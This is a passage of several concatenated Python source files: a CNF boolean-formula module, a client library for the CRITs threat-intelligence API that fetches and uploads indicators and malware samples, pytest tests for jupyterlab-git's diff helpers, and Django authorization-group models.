        elif isinstance(x, cls):
            return x
        else:
            raise Exception("Could not create a Cnf object from %s" % str(type(x)))

    def __and__(self, other):
        # Conjunction: concatenate the clause lists.
        other = NaiveCnf.create_from(other)
        result = NaiveCnf()
        result.dis = self.dis + other.dis
        return result

    def __or__(self, other):
        # Disjunction by distribution: merge every clause pair.
        other = NaiveCnf.create_from(other)
        if len(self.dis) > 0 and len(other.dis) > 0:
            new_dis = []
            for d1, d2 in [(d1, d2) for d1 in self.dis for d2 in other.dis]:
                d3 = d1 | d2
                new_dis.append(d3)
        elif len(self.dis) == 0:
            new_dis = other.dis
        else:
            new_dis = self.dis
        c = NaiveCnf()
        c.dis = new_dis
        return c

    def __xor__(self, other):
        # a xor b == (a | b) & (-a | -b)
        return (self | other) & (-self | -other)

    def __neg__(self):
        # De Morgan: each clause becomes a conjunction of negated unit
        # clauses; the per-clause results are OR-ed back together.
        cnfs = []
        for d in self.dis:
            c = NaiveCnf()
            for v in d:
                c.dis.append(frozenset([-v]))
            cnfs.append(c)
        ret = NaiveCnf()
        for cnf in cnfs:
            ret |= cnf
        return ret

    def __rshift__(self, other):  # implies
        return -self | other

    def __str__(self):
        ret = []
        for d in self.dis:
            ret.append(" | ".join(map(str, d)))
        return "(" + ") & (".join(ret) + ")"

    def __eq__(self, other):
        return self.dis == other.dis

    def __hash__(self):
        # BUG FIX: self.dis is a list, which is unhashable — hash(self.dis)
        # always raised TypeError. Hash a tuple snapshot of the clauses
        # instead, keeping hash consistent with __eq__.
        return hash(tuple(self.dis))
def reduceCnf(cnf):
    """Simplifies a CNF formula.

    Two reductions are applied:

    * a clause containing a complementary pair (b | -b) is a tautology and
      is dropped entirely — so (-b | b | c) becomes nothing, not (c):
      (-b | b) & (b | -a) & (-b | a) & (a | -a)  becomes  (b | -a) & (-b | a)
    * duplicate clauses are kept only once:
      (-e | a) & (-e | a) & (-e | a)  becomes  (-e | a)
    """
    output = Cnf()
    for clause in cnf.dis:
        # Tautology check: the clause holds both a literal and its negation.
        if any(-lit in clause for lit in clause):
            continue
        # TODO: Is this necessary anymore? Probably not. Do statistical analysis.
        if clause not in output.dis:
            output.dis.append(clause)
    return output
class Cnf(object):
    """Conjunctive-normal-form formula that self-reduces via `reduceCnf`.

    `dis` is a list of clauses; each clause is a `frozenset` of literals
    (disjunction), and the clauses are conjoined.
    """

    def __init__(self):
        self.dis = []

    @classmethod
    def create_from(cls, x):
        """Wraps a Variable as a one-clause CNF; passes a Cnf through."""
        if isinstance(x, Variable):
            cnf = Cnf()
            cnf.dis = [frozenset([x])]
            return cnf
        elif isinstance(x, cls):
            return x
        else:
            raise Exception("Could not create a Cnf object from %s" % str(type(x)))

    def __and__(self, other):
        # Conjunction: concatenate the clause lists (no reduction here).
        other = Cnf.create_from(other)
        result = Cnf()
        result.dis = self.dis + other.dis
        return result

    def __or__(self, other):
        # Disjunction by distribution, deduplicating merged clauses,
        # then reducing the result.
        other = Cnf.create_from(other)
        if len(self.dis) > 0 and len(other.dis) > 0:
            new_dis = []
            for d1, d2 in [(d1, d2) for d1 in self.dis for d2 in other.dis]:
                d3 = d1 | d2
                if d3 not in new_dis:
                    new_dis.append(d3)
        elif len(self.dis) == 0:
            new_dis = other.dis
        else:
            new_dis = self.dis
        c = Cnf()
        c.dis = new_dis
        return reduceCnf(c)

    def __xor__(self, other):
        # a xor b == (a | b) & (-a | -b), reduced.
        return reduceCnf((self | other) & (-self | -other))

    def __neg__(self):
        # De Morgan: each clause becomes a conjunction of negated unit
        # clauses (reduced); the per-clause results are OR-ed back together.
        cnfs = []
        for d in self.dis:
            c = Cnf()
            for v in d:
                c.dis.append(frozenset([-v]))
            x = reduceCnf(c)
            if x not in cnfs:
                cnfs.append(x)
        ret = Cnf()
        for cnf in cnfs:
            ret |= cnf
        return ret

    def __rshift__(self, other):  # implies
        return -self | other

    def __str__(self):
        ret = []
        for d in self.dis:
            ret.append(" | ".join(map(str, d)))
        return "(" + ") & (".join(ret) + ")"

    def __eq__(self, other):
        return self.dis == other.dis

    def __hash__(self):
        # BUG FIX: self.dis is a list, which is unhashable — hash(self.dis)
        # always raised TypeError. Hash a tuple snapshot of the clauses
        # instead, keeping hash consistent with __eq__.
        return hash(tuple(self.dis))
# Bind the reducing implementation to Variable's boolean operators.
# Change this to NaiveCnf if you want.
cnfClass = Cnf
|
|
import os
import json
import zipfile
import hashlib
import requests
import backoff
from zipfile import ZipFile
from io import BytesIO
class pycritsFetchError(Exception):
    """Raised when a CRITs API request fails or its response cannot be parsed.

    :param message: human-readable description of the failure.
    """

    def __init__(self, message):
        # BUG FIX: call Exception.__init__ so that e.args, repr() and
        # pickling behave normally (the original left args empty).
        super(pycritsFetchError, self).__init__(message)
        self.message = message

    def __str__(self):
        return self.message
class pycrits(object):
    """Client for the CRITs REST API (api/v1).

    Handles authenticated GET/POST requests with retry/backoff, paginated
    listings, binary (password-protected zip) downloads, and uploads of the
    various CRITs object types.
    """

    _API_VERSION = '/api/v1/'
    _ACTORS = 'actors/'
    _ACTOR_IDENTIFIERS = 'actoridentifiers/'
    _CAMPAIGNS = 'campaigns/'
    _CERTIFICATES = 'certificates/'
    _DOMAINS = 'domains/'
    _EMAILS = 'emails/'
    _EVENTS = 'events/'
    _INDICATORS = 'indicators/'
    _IPS = 'ips/'
    _PCAPS = 'pcaps/'
    _RAW_DATA = 'raw_data/'
    _SAMPLES = 'samples/'
    _SCREENSHOTS = 'screenshots/'
    _TARGETS = 'targets/'
    # POST only.
    _RELATIONSHIPS = 'relationships/'
    # The password for zip files.
    _PASSWORD = 'infected'

    def __init__(self, host, username, api_key):
        """
        :param host: base URL of the CRITs instance.
        :param username: account name used for authentication.
        :param api_key: API key associated with the account.
        """
        self._base_url = host + self._API_VERSION
        self._host = host
        self._username = username
        self._api_key = api_key
        self._verify = True
        self._retries = 0

    @property
    def host(self):
        return self._host

    @host.setter
    def host(self, value):
        # Keep the precomputed base URL in sync with the new host.
        self._host = value
        self._base_url = value + self._API_VERSION

    @property
    def username(self):
        return self._username

    @username.setter
    def username(self, value):
        self._username = value

    @property
    def api_key(self):
        return self._api_key

    @api_key.setter
    def api_key(self, value):
        self._api_key = value

    @property
    def verify(self):
        return self._verify

    # Verify can take True, False or path to .pem file (to verify the server's cert)
    @verify.setter
    def verify(self, value):
        self._verify = value

    @property
    def retries(self):
        return self._retries

    @retries.setter
    def retries(self, value):
        self._retries = value

    def _max_tries(self):
        # backoff counts max_tries as the *total* number of attempts:
        # guarantee at least one attempt even when retries is 0.
        return max(self._retries, 1)

    @staticmethod
    def _copy_params(params):
        # BUG FIX: the original methods used a shared mutable default ({})
        # and mutated the caller's dict (injecting username/api_key, etc.),
        # leaking state across calls. Always work on a private copy.
        return dict(params) if params else {}

    def post_url(self, url, data, files, verify, proxies=None):
        """POST `url`, retrying with exponential backoff on request errors.

        BUG FIX: the decorator is applied at call time. Decorating at
        class-definition time with max_tries=self._retries raised a
        NameError (`self` does not exist in a class body) and could never
        see the instance's current `retries` value.
        """
        @backoff.on_exception(backoff.expo, requests.exceptions.RequestException,
                              max_tries=self._max_tries())
        def _do_post():
            return requests.post(url, data=data, files=files, verify=verify,
                                 proxies=proxies)
        return _do_post()

    def get_url(self, url, params, verify, proxies=None):
        """GET `url`, retrying with exponential backoff on request errors.

        See post_url for why backoff is applied at call time.
        """
        @backoff.on_exception(backoff.expo, requests.exceptions.RequestException,
                              max_tries=self._max_tries())
        def _do_get():
            return requests.get(url, params=params, verify=verify, proxies=proxies)
        return _do_get()

    # Used for posting.
    def _post(self, url, params=None, files=None):
        """POST to a relative API `url` and return the decoded JSON.

        :raises pycritsFetchError: on a non-200 response or unparsable JSON.
        """
        params = self._copy_params(params)
        params['username'] = self._username
        params['api_key'] = self._api_key
        url = self._base_url + url
        resp = self.post_url(url, data=params, files=files, verify=self._verify, proxies=None)
        if resp.status_code != 200:
            raise pycritsFetchError("Response code: %s" % resp.status_code)
        try:
            results = json.loads(resp.text)
        except ValueError:
            # json.loads raises ValueError (JSONDecodeError) on bad payloads;
            # a bare except would also have hidden programming errors.
            raise pycritsFetchError("Unable to load JSON.")
        return results

    # Actually do the fetching.
    def _do_fetch(self, url, params=None):
        """GET an absolute `url` and return the decoded JSON.

        :raises pycritsFetchError: on a non-200 response or unparsable JSON.
        """
        resp = self.get_url(url, params=params, verify=self._verify, proxies=None)
        if resp.status_code != 200:
            raise pycritsFetchError("Response code: %s" % resp.status_code)
        try:
            results = json.loads(resp.text)
        except ValueError:
            raise pycritsFetchError("Unable to load JSON.")
        return results

    # Fetch and return once.
    def _single_fetch(self, url, params=None):
        params = self._copy_params(params)
        params['username'] = self._username
        params['api_key'] = self._api_key
        url = self._base_url + url
        return self._do_fetch(url, params=params)

    # Fetch and yield a generator. Iterations will continue to fetch.
    def _fetch_generator(self, url, total, params=None):
        """Yields objects from a paginated listing endpoint.

        :param total: maximum number of objects to yield; -1 means "no limit".
        """
        params = self._copy_params(params)
        params['username'] = self._username
        params['api_key'] = self._api_key
        url = self._base_url + url
        if total == 0:
            # Preserved behavior: a zero-item request yields a single None.
            # BUG FIX: stop here instead of falling through and fetching anyway.
            yield None
            return
        next_ = True
        while next_:
            results = self._do_fetch(url, params)
            for obj in results['objects']:
                if total == 0:
                    # BUG FIX: plain return instead of raising StopIteration
                    # inside a generator (illegal since PEP 479 / Python 3.7).
                    return
                yield obj
                total -= 1
            next_ = results['meta']['next']
            if next_:
                url = self._host + next_
                params = {}

    def actors(self, params=None, total=-1):
        return self._fetch_generator(self._ACTORS, total, params=params)

    def actor_identifiers(self, params=None, total=-1):
        return self._fetch_generator(self._ACTOR_IDENTIFIERS, total, params=params)

    def campaigns(self, params=None, total=-1):
        return self._fetch_generator(self._CAMPAIGNS, total, params=params)

    def certificates(self, params=None, total=-1):
        return self._fetch_generator(self._CERTIFICATES, total, params=params)

    def domains(self, params=None, total=-1):
        return self._fetch_generator(self._DOMAINS, total, params=params)

    def emails(self, params=None, total=-1):
        return self._fetch_generator(self._EMAILS, total, params=params)

    def events(self, params=None, total=-1):
        return self._fetch_generator(self._EVENTS, total, params=params)

    def indicators(self, params=None, total=-1):
        return self._fetch_generator(self._INDICATORS, total, params=params)

    def ips(self, params=None, total=-1):
        return self._fetch_generator(self._IPS, total, params=params)

    def pcaps(self, params=None, total=-1):
        return self._fetch_generator(self._PCAPS, total, params=params)

    def raw_datas(self, params=None, total=-1):
        return self._fetch_generator(self._RAW_DATA, total, params=params)

    def samples(self, params=None, total=-1):
        return self._fetch_generator(self._SAMPLES, total, params=params)

    def screenshots(self, params=None, total=-1):
        return self._fetch_generator(self._SCREENSHOTS, total, params=params)

    def targets(self, params=None, total=-1):
        return self._fetch_generator(self._TARGETS, total, params=params)

    # Fetch a single item given the ID.
    def actor(self, id_, params=None):
        return self._single_fetch(self._ACTORS + id_ + '/', params)

    def actor_identifier(self, id_, params=None):
        return self._single_fetch(self._ACTOR_IDENTIFIERS + id_ + '/', params)

    def campaign(self, id_, params=None):
        return self._single_fetch(self._CAMPAIGNS + id_ + '/', params)

    def certificate(self, id_, params=None):
        return self._single_fetch(self._CERTIFICATES + id_ + '/', params)

    def domain(self, id_, params=None):
        return self._single_fetch(self._DOMAINS + id_ + '/', params)

    def email(self, id_, params=None):
        return self._single_fetch(self._EMAILS + id_ + '/', params)

    def event(self, id_, params=None):
        return self._single_fetch(self._EVENTS + id_ + '/', params)

    def indicator(self, id_, params=None):
        return self._single_fetch(self._INDICATORS + id_ + '/', params)

    def ip(self, id_, params=None):
        return self._single_fetch(self._IPS + id_ + '/', params)

    def pcap(self, id_, params=None):
        return self._single_fetch(self._PCAPS + id_ + '/', params)

    def raw_data(self, id_, params=None):
        return self._single_fetch(self._RAW_DATA + id_ + '/', params)

    def sample(self, id_, params=None):
        return self._single_fetch(self._SAMPLES + id_ + '/', params)

    def screenshot(self, id_, params=None):
        return self._single_fetch(self._SCREENSHOTS + id_ + '/', params)

    def target(self, id_, params=None):
        return self._single_fetch(self._TARGETS + id_ + '/', params)

    # Fetch a campaign by name.
    def campaign_by_name(self, name, params=None):
        params = self._copy_params(params)
        params['c-name'] = name
        results = self._single_fetch(self._CAMPAIGNS, params)
        return results['objects']

    # Force limit to 1 and only return _id.
    def _fetch_count(self, url, params=None):
        params = self._copy_params(params)
        params['limit'] = 1
        params['only'] = 'id'
        results = self._single_fetch(url, params)
        return results['meta']['total_count']

    def actor_count(self, params=None):
        return self._fetch_count(self._ACTORS, params)

    def actor_identifier_count(self, params=None):
        return self._fetch_count(self._ACTOR_IDENTIFIERS, params)

    def campaign_count(self, params=None):
        return self._fetch_count(self._CAMPAIGNS, params)

    def certificate_count(self, params=None):
        return self._fetch_count(self._CERTIFICATES, params)

    def domain_count(self, params=None):
        return self._fetch_count(self._DOMAINS, params)

    def email_count(self, params=None):
        return self._fetch_count(self._EMAILS, params)

    def event_count(self, params=None):
        return self._fetch_count(self._EVENTS, params)

    # NOTE: the original class defined indicator_count twice; the duplicate
    # (identical) definition has been removed.
    def indicator_count(self, params=None):
        return self._fetch_count(self._INDICATORS, params)

    def pcap_count(self, params=None):
        return self._fetch_count(self._PCAPS, params)

    def raw_data_count(self, params=None):
        return self._fetch_count(self._RAW_DATA, params)

    def sample_count(self, params=None):
        return self._fetch_count(self._SAMPLES, params)

    def screenshot_count(self, params=None):
        return self._fetch_count(self._SCREENSHOTS, params)

    def target_count(self, params=None):
        return self._fetch_count(self._TARGETS, params)

    def _fetch_binary(self, url, id_=None, params=None):
        """Downloads a binary payload and returns it wrapped in a BytesIO."""
        params = self._copy_params(params)
        params['username'] = self._username
        params['api_key'] = self._api_key
        params['file'] = 1
        url = self._base_url + url
        if id_:
            url += id_ + '/'
        # BUG FIX: the proxies argument was missing, which raised a TypeError
        # against get_url's original (required) signature.
        resp = self.get_url(url, params=params, verify=self._verify, proxies=None)
        if resp.status_code != 200:
            raise pycritsFetchError("Response code: %s" % resp.status_code)
        return BytesIO(resp.content)

    # If not a zip file (ie: "No files found") just return an empty list.
    def _unzip_file(self, file_):
        """Extracts every member of a password-protected zip into memory.

        :return: list of {'filename': ..., 'data': ...} dicts.
        """
        results = []
        if not zipfile.is_zipfile(file_):
            return results
        # BUG FIX: the original referenced `zf` in its except handler even
        # when ZipFile() itself failed (NameError). try/finally with a
        # context manager closes both handles on every path.
        try:
            with ZipFile(file_, 'r') as zf:
                for fileentry in zf.infolist():
                    unzipped_file = zf.open(fileentry, pwd=self._PASSWORD).read()
                    results.append({'filename': fileentry.filename,
                                    'data': unzipped_file})
        finally:
            file_.close()
        return results

    def fetch_sample(self, md5=None, sha256=None, id_=None, params=None):
        """Downloads and unzips a sample by md5, sha256 or id (first one set wins)."""
        params = self._copy_params(params)
        if md5:
            params['c-md5'] = md5
            file_ = self._fetch_binary(self._SAMPLES, params=params)
        elif sha256:
            params['c-sha256'] = sha256
            file_ = self._fetch_binary(self._SAMPLES, params=params)
        elif id_:
            file_ = self._fetch_binary(self._SAMPLES, id_=id_, params=params)
        else:
            file_ = self._fetch_binary(self._SAMPLES, params=params)
        return self._unzip_file(file_)

    def fetch_pcap(self, md5=None, id_=None, params=None):
        """Downloads and unzips a PCAP by md5 or id (md5 wins)."""
        params = self._copy_params(params)
        if md5:
            params['c-md5'] = md5
            file_ = self._fetch_binary(self._PCAPS, params=params)
        elif id_:
            file_ = self._fetch_binary(self._PCAPS, id_=id_, params=params)
        else:
            file_ = self._fetch_binary(self._PCAPS, params=params)
        return self._unzip_file(file_)

    # Helper to handle file uploads.
    # Take either a path to a file on disk or a file object.
    # If given both, the filepath will take precedence.
    # If we don't have a filename get it from filepath or use
    # the md5 of the data from file_obj.
    def _get_file_data(self, file_obj, filepath, filename):
        if not file_obj and not filepath:
            return None
        if filepath:
            file_obj = open(filepath, 'rb')
        if not filename:
            # Try to generate it from filepath if we have that.
            if filepath:
                filename = os.path.basename(filepath)
            # If someone does something crazy like filepath='/tmp/'
            # then basename() returns ''. Use MD5 in that case.
            if not filename:
                filename = hashlib.md5(file_obj.read()).hexdigest()
                file_obj.seek(0)
        return {'filedata': (filename, file_obj)}

    # Add objects to CRITs.
    def add_actor(self, name, source, params=None):
        params = self._copy_params(params)
        params['name'] = name
        params['source'] = source
        return self._post(self._ACTORS, params)

    def add_actor_identifier(self, id_type, id_, source, params=None):
        params = self._copy_params(params)
        params['identifier_type'] = id_type
        params['identifier'] = id_
        params['source'] = source
        return self._post(self._ACTOR_IDENTIFIERS, params)

    def add_campaign(self, name, params=None):
        params = self._copy_params(params)
        params['name'] = name
        return self._post(self._CAMPAIGNS, params)

    def add_certificate(self, source, file_obj=None, filepath=None,
                        filename=None, params=None):
        if not file_obj and not filepath:
            raise pycritsFetchError("Need a file object or filepath")
        params = self._copy_params(params)
        files = self._get_file_data(file_obj, filepath, filename)
        params['source'] = source
        return self._post(self._CERTIFICATES, params, files=files)

    def add_domain(self, domain, source, params=None):
        params = self._copy_params(params)
        params['domain'] = domain
        params['source'] = source
        return self._post(self._DOMAINS, params)

    def add_email(self, type_, source, file_obj=None, filepath=None,
                  filename=None, params=None):
        params = self._copy_params(params)
        files = self._get_file_data(file_obj, filepath, filename)
        params['upload_type'] = type_
        params['source'] = source
        return self._post(self._EMAILS, params, files=files)

    def add_event(self, type_, title, description, source, params=None):
        params = self._copy_params(params)
        params['event_type'] = type_
        params['title'] = title
        params['description'] = description
        params['source'] = source
        return self._post(self._EVENTS, params)

    def add_indicator(self, type_, value, source, params=None):
        params = self._copy_params(params)
        params['type'] = type_
        params['value'] = value
        params['source'] = source
        return self._post(self._INDICATORS, params)

    def add_ip(self, ip, type_, source, params=None):
        params = self._copy_params(params)
        params['source'] = source
        params['ip'] = ip
        params['ip_type'] = type_
        return self._post(self._IPS, params)

    def add_pcap(self, source, file_obj=None, filepath=None, filename=None,
                 params=None):
        if not file_obj and not filepath:
            raise pycritsFetchError("Need a file object or filepath")
        params = self._copy_params(params)
        files = self._get_file_data(file_obj, filepath, filename)
        params['source'] = source
        return self._post(self._PCAPS, params, files=files)

    def add_raw_data(self, type_, title, data_type, source, data=None,
                     file_obj=None, filepath=None, filename=None, params=None):
        params = self._copy_params(params)
        files = self._get_file_data(file_obj, filepath, filename)
        params['data'] = data
        params['upload_type'] = type_
        params['title'] = title
        params['data_type'] = data_type
        params['source'] = source
        return self._post(self._RAW_DATA, params, files=files)

    def add_sample(self, type_, source, file_obj=None, filepath=None,
                   filename=None, params=None):
        params = self._copy_params(params)
        files = self._get_file_data(file_obj, filepath, filename)
        # Set filename so it is honored for metadata uploads too.
        params['upload_type'] = type_
        params['filename'] = filename
        params['source'] = source
        return self._post(self._SAMPLES, params, files=files)

    def add_screenshot(self, type_, oid, otype, source, file_obj=None,
                       filepath=None, filename=None, params=None):
        params = self._copy_params(params)
        files = self._get_file_data(file_obj, filepath, filename)
        params['upload_type'] = type_
        params['oid'] = oid
        params['otype'] = otype
        params['source'] = source
        return self._post(self._SCREENSHOTS, params, files=files)

    def add_target(self, email, params=None):
        params = self._copy_params(params)
        params['email_address'] = email
        return self._post(self._TARGETS, params)

    def add_relationship(self, left_type, left_id, right_type, right_id,
                         rel_type, params=None):
        params = self._copy_params(params)
        params['left_type'] = left_type
        params['right_type'] = right_type
        params['left_id'] = left_id
        params['right_id'] = right_id
        params['rel_type'] = rel_type
        return self._post(self._RELATIONSHIPS, params)
|
|
import json
import nbformat
from pathlib import Path
from subprocess import CalledProcessError
from unittest.mock import patch
import pytest
import tornado
from jupyterlab_git.git import Git
from .testutils import maybe_future
@pytest.mark.asyncio
async def test_changed_files_invalid_input():
    """A call with only `base` (no `remote`/`single_commit`) must raise HTTPError."""
    with pytest.raises(tornado.web.HTTPError):
        await Git().changed_files(
            path="test-path", base="64950a634cd11d1a01ddfedaeffed67b531cb11e"
        )
@pytest.mark.asyncio
async def test_changed_files_single_commit():
    """`single_commit` should map to `git diff <ref> --name-only -z` and split on NUL."""
    with patch("jupyterlab_git.git.execute") as mock_execute:
        # Given
        mock_execute.return_value = maybe_future((0, "file1.ipynb\x00file2.py\x00", ""))
        # When
        actual_response = await Git().changed_files(
            path="test-path",
            single_commit="64950a634cd11d1a01ddfedaeffed67b531cb11e^!",
        )
        # Then
        mock_execute.assert_called_once_with(
            [
                "git",
                "diff",
                "64950a634cd11d1a01ddfedaeffed67b531cb11e^!",
                "--name-only",
                "-z",
            ],
            cwd="test-path",
        )
        # Trailing NUL must not produce an empty file entry
        assert {"code": 0, "files": ["file1.ipynb", "file2.py"]} == actual_response
@pytest.mark.asyncio
async def test_changed_files_working_tree():
    """base='WORKING' vs remote should diff the working tree against the remote ref."""
    with patch("jupyterlab_git.git.execute") as mock_execute:
        # Given
        mock_execute.return_value = maybe_future((0, "file1.ipynb\x00file2.py", ""))
        # When
        actual_response = await Git().changed_files(
            path="test-path", base="WORKING", remote="HEAD"
        )
        # Then
        mock_execute.assert_called_once_with(
            ["git", "diff", "HEAD", "--name-only", "-z"],
            cwd="test-path",
        )
        assert {"code": 0, "files": ["file1.ipynb", "file2.py"]} == actual_response
@pytest.mark.asyncio
async def test_changed_files_index():
    """base='INDEX' vs remote should add --staged to the diff command."""
    with patch("jupyterlab_git.git.execute") as mock_execute:
        # Given
        mock_execute.return_value = maybe_future((0, "file1.ipynb\x00file2.py", ""))
        # When
        actual_response = await Git().changed_files(
            path="test-path", base="INDEX", remote="HEAD"
        )
        # Then
        mock_execute.assert_called_once_with(
            ["git", "diff", "--staged", "HEAD", "--name-only", "-z"],
            cwd="test-path",
        )
        assert {"code": 0, "files": ["file1.ipynb", "file2.py"]} == actual_response
@pytest.mark.asyncio
async def test_changed_files_two_commits():
    """Two concrete refs should be diffed directly against each other."""
    with patch("jupyterlab_git.git.execute") as mock_execute:
        # Given
        mock_execute.return_value = maybe_future((0, "file1.ipynb\x00file2.py", ""))
        # When
        actual_response = await Git().changed_files(
            path="test-path", base="HEAD", remote="origin/HEAD"
        )
        # Then
        mock_execute.assert_called_once_with(
            ["git", "diff", "HEAD", "origin/HEAD", "--name-only", "-z"],
            cwd="test-path",
        )
        assert {"code": 0, "files": ["file1.ipynb", "file2.py"]} == actual_response
@pytest.mark.asyncio
async def test_changed_files_git_diff_error():
    """A CalledProcessError from git diff is reported as a code/message dict."""
    with patch("jupyterlab_git.git.execute") as mock_execute:
        # Given
        mock_execute.side_effect = CalledProcessError(128, b"cmd", b"error message")
        # When
        actual_response = await Git().changed_files(
            path="test-path", base="HEAD", remote="origin/HEAD"
        )
        # Then
        mock_execute.assert_called_once_with(
            ["git", "diff", "HEAD", "origin/HEAD", "--name-only", "-z"],
            cwd="test-path",
        )
        assert {"code": 128, "message": "error message"} == actual_response
@pytest.mark.asyncio
@pytest.mark.parametrize(
    "args, cli_result, cmd, expected",
    [
        # Text file vs a commit: numstat reports line counts -> not binary.
        (
            ("dummy.txt", "ar539ie5", "/bin"),
            (0, "2\t1\tdummy.txt", ""),
            [
                "git",
                "diff",
                "--numstat",
                "4b825dc642cb6eb9a060e54bf8d69288fbee4904",
                "ar539ie5",
                "--",
                "dummy.txt",
            ],
            False,
        ),
        # Binary file vs a commit: numstat reports "-" counts -> binary.
        (
            ("dummy.png", "ar539ie5", "/bin"),
            (0, "-\t-\tdummy.png", ""),
            [
                "git",
                "diff",
                "--numstat",
                "4b825dc642cb6eb9a060e54bf8d69288fbee4904",
                "ar539ie5",
                "--",
                "dummy.png",
            ],
            True,
        ),
        # Staged text file: the ref "INDEX" becomes `--cached` against the
        # empty tree.
        (
            ("dummy.txt", "INDEX", "/bin"),
            (0, "2\t1\tdummy.txt", ""),
            [
                "git",
                "diff",
                "--numstat",
                "--cached",
                "4b825dc642cb6eb9a060e54bf8d69288fbee4904",
                "--",
                "dummy.txt",
            ],
            False,
        ),
        # Staged binary file.
        (
            ("dummy.png", "INDEX", "/bin"),
            (0, "-\t-\tdummy.png", ""),
            [
                "git",
                "diff",
                "--numstat",
                "--cached",
                "4b825dc642cb6eb9a060e54bf8d69288fbee4904",
                "--",
                "dummy.png",
            ],
            True,
        ),
        # A generic git failure surfaces as an HTTPError.
        (
            ("dummy.txt", "ar539ie5", "/bin"),
            (128, "", "fatal: Git command failed"),
            [
                "git",
                "diff",
                "--numstat",
                "4b825dc642cb6eb9a060e54bf8d69288fbee4904",
                "ar539ie5",
                "--",
                "dummy.txt",
            ],
            tornado.web.HTTPError,
        ),
        # A path unknown to git is treated as "not binary" rather than an
        # error.
        (
            ("dummy.txt", "ar539ie5", "/bin"),
            (
                128,
                "",
                "fatal: Path 'dummy.txt' does not exist (neither on disk nor in the index)",
            ),
            [
                "git",
                "diff",
                "--numstat",
                "4b825dc642cb6eb9a060e54bf8d69288fbee4904",
                "ar539ie5",
                "--",
                "dummy.txt",
            ],
            False,
        ),
    ],
)
async def test_is_binary_file(args, cli_result, cmd, expected):
    """Git._is_binary detects binary files via `git diff --numstat`.

    args: (filename, ref, repo path) forwarded to _is_binary; cli_result is
    the faked (code, stdout, stderr) triple returned by git; cmd is the git
    command line expected to be executed; expected is either a bool result
    or an exception type that must be raised.
    """
    with patch("jupyterlab_git.git.execute") as mock_execute:
        # Given
        mock_execute.return_value = maybe_future(cli_result)

        if isinstance(expected, type) and issubclass(expected, Exception):
            with pytest.raises(expected):
                await Git()._is_binary(*args)
        else:
            # When
            actual_response = await Git()._is_binary(*args)

            # Then
            mock_execute.assert_called_once_with(cmd, cwd="/bin")
            assert actual_response == expected
@pytest.mark.asyncio
async def test_Git_get_nbdiff_file():
    """get_nbdiff accepts notebook contents as raw JSON strings."""
    samples = Path(__file__).parent.resolve() / "samples"
    base = (samples / "ipynb_base.json").read_text()
    remote = (samples / "ipynb_remote.json").read_text()

    diff = await Git().get_nbdiff(base, remote)

    assert diff == json.loads((samples / "ipynb_nbdiff.json").read_text())
@pytest.mark.asyncio
async def test_Git_get_nbdiff_dict():
    """get_nbdiff also accepts notebook contents as already-parsed dicts."""
    samples = Path(__file__).parent.resolve() / "samples"
    base = json.loads((samples / "ipynb_base.json").read_text())
    remote = json.loads((samples / "ipynb_remote.json").read_text())

    diff = await Git().get_nbdiff(base, remote)

    assert diff == json.loads((samples / "ipynb_nbdiff.json").read_text())
@pytest.mark.asyncio
async def test_Git_get_nbdiff_no_content():
    """Empty inputs diff to an empty notebook with no changes."""
    diff = await Git().get_nbdiff("", "")

    empty_notebook = nbformat.versions[nbformat.current_nbformat].new_notebook()
    assert diff == {"base": empty_notebook, "diff": []}
|
|
from django.db import models
from wsgiref.handlers import format_date_time
import time
from authz_group.authz_implementation.solstice import (
SolsticeCrowdImplementation)
from django.conf import settings
class Person(models.Model):
    """A user known to the authz system, identified by (login_name, realm)."""
    person_id = models.AutoField(primary_key=True, db_column='person_id')
    # NOTE(review): Django does not enforce max_length on a TextField at the
    # database level (it only affects form widgets) -- confirm whether
    # CharField was intended here.
    login_name = models.TextField(max_length=128, db_column='login_name')
    name = models.TextField(max_length=255, db_column='name')
    # This is a shim for an approach to handle scoped login names.
    # If you had joe@google.com, and joe@yahoo.com, google.com could be
    # login_realm:1, and yahoo.com login_realm:2, so the users would be stored
    # as (joe, 1) and (joe, 2)
    # This was done as an easy way to separate privileges by where a person is
    # from.
    login_realm_id = models.IntegerField(db_column='login_realm_id', default=1)

    class Meta:
        db_table = 'Person'
class Crowd(models.Model):
    """A wrapper row tying a backend-specific group to its implementation.

    A Crowd is identified by (source_key, source_type): source_key is the
    backend's own id for the group and source_type names the backend
    implementation class that can resolve it.
    """
    id = models.AutoField(primary_key=True, db_column='group_id')
    source_key = models.CharField(max_length=100, db_column='source_key',
                                  db_index=True)
    source_type = models.CharField(max_length=100, db_column='model_package')
    owners = models.ManyToManyField(Person, through='CrowdOwner')

    # Maps source_type strings to backend classes; populated by
    # register_source_types() at module import time.
    _source_types = {}

    def get_group(self):
        """Return the backend group object attached by _wrap_group().

        Raises when this Crowd was loaded straight from the database and no
        implementation group has been attached.
        """
        # Bug fix: _group is set dynamically by _wrap_group(), so a plain
        # attribute access raised AttributeError (instead of the intended
        # exception) on an un-wrapped instance.
        group = getattr(self, '_group', None)
        if group:
            return group
        raise Exception("Not implemented!")

    def is_member(self, login_name):
        """True if login_name is a member of this crowd, per its backend."""
        backend = self.get_backend_for_source(self.source_type)
        return backend().is_member_of_group(login_name, self.source_key)

    def json_data_structure(self):
        """JSON-serializable description of this crowd, including any
        backend-specific details the implementation group exposes."""
        css_source_type = self.source_type.replace(':', '-')
        data = {
            'id': self.id,
            'source_key': self.source_key,
            'source_type': self.source_type,
            'css_source_type': css_source_type,
            'implementation': [],
        }
        group = self.get_group()
        if hasattr(group, 'json_data_structure'):
            data["implementation"] = group.json_data_structure()
        return data

    @staticmethod
    def get_crowds_for_user(login_name):
        """All crowds the user belongs to, across every registered backend."""
        all_groups = []
        for implementation in Crowd.get_crowd_backends():
            all_groups.extend(implementation.get_groups_for_user(login_name))
        return Crowd.wrap_implementations_in_crowds(all_groups)

    @staticmethod
    def get_crowd_backends():
        """Return the list of backend implementation classes.

        XXX: AUTHZ_GROUP_CROWD_IMPLEMENTATIONS is checked but not yet
        honored -- only the Solstice backend is currently returned.
        """
        if hasattr(settings, 'AUTHZ_GROUP_CROWD_IMPLEMENTATIONS'):
            pass
        return [SolsticeCrowdImplementation]

    @staticmethod
    def wrap_implementations_in_crowds(implementation_groups):
        """Wrap raw backend group objects in (possibly new) Crowd rows."""
        return [Crowd._wrap_group(group) for group in implementation_groups]

    @staticmethod
    def _wrap_group(group):
        # get_or_create keys on the backend id + type so the same backend
        # group always maps to the same Crowd row.
        crowd, created = Crowd.objects.get_or_create(
            source_key=group.id, source_type=group.get_source_type())
        crowd._group = group
        return crowd

    @staticmethod
    def register_source_types():
